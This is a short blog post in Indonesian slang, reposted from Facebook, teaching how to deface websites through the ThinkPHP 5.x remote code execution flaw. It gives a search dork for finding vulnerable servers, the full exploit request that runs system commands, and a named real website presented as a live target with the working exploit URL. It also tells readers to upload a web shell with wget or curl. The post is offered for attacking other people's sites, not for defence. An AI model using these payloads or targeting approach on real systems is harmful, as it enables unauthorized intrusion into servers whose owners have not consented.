ThinkPHP 5.x Remote Code Execution


Source: https://www.facebook.com/506307912725406/posts/2675462362476606/?app=fbl

yo gan kali ini w share tutor dipes yah:3 yups ThinkPHP R.C.E langsung ae oke karna w juga greget klo ada yg share tutor dipes diper-ribet:"v
pertama siapin bahannya dolo:

  1. dork
  2. shell
  3. sc dipes


Dork: intitle:index of intext:public runtime LICENSE.txt

Exploit: /public/index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=dir

PoC

dorking dolo gayn hehe, pilih salah satu oce
Note: dir itu bisa kalian ubah karna itu command nya

Example: site.com/path/public/index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=uname

disini saya ada live target:
https://www.shimokeji.cn/tp5/
jadi tinggal exe aja


https://www.shimokeji.cn/public/index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=dir

tinggal upload shell kalian pakai wget/curl

0 Response to "ThinkPHP 5.x Remote Code Execution"

Post a Comment

Iklan Atas Artikel

Iklan Tengah Artikel 1

Iklan Tengah Artikel 2

Iklan Bawah Artikel